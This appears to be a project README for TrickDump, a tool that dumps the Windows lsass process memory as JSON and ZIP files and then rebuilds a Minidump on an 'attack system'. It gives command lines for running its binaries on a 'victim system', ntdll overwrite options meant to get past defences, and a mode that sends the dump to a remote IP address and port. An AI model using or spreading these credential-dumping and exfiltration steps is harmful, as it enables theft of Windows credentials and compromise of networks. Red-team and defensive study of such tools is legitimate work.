Home

Awesome

TrickDump

TrickDump dumps the lsass process without creating a Minidump file, generating instead 3 JSON and 1 ZIP file with the memory region dumps. In three steps:

img

In the attack system, use the create_dump.py script to generate the Minidump file:

python3 create_dump.py [-l LOCK_JSON] [-s SHOCK_JSON] [-b BARREL_JSON] [-z BARREL_ZIP] [-o OUTPUT_FILE] 

The benefits of this technique are:

It comes in five flavours:

It will not work if PPL is enabled, the PEB structure is unreadable or the binaries are not compiled as 64-bit. Update: Now it is possible to execute the programs without reading the PEB, check the peb-unreadable branch :)


Usage

The programs are executed in the victim system, creating three JSON files (with memory regions information) and one zip file (with each memory region dump).

Lock.exe [disk/knowndlls/debugproc]
Shock.exe [disk/knowndlls/debugproc]
Barrel.exe [disk/knowndlls/debugproc]

You can execute the programs directly without overwriting the ntdll.dll library:

img1

Or use one of the three different overwrite techniques:

img2

Then the Minidump file is generated:

img3


All in one

If you prefer to execute only one binary, Trick.exe generates a ZIP file containing the 3 JSON files and the ZIP file with the memory regions:

Trick.exe [disk/knowndlls/debugproc] [IP_ADDRESS] [PORT]

You can create the ZIP file locally, optionally using a Ntdll overwrite method:

img5

Or send it to a remote port using the second and third parameter as the IP address and the port:

img6

In both cases you get a ZIP file like this, unzip it and create the Minidump file:

img7


⭐ Support This Project by Starring the Repository!

If you find this project helpful or interesting, please consider giving it a star 🌟 on GitHub! :)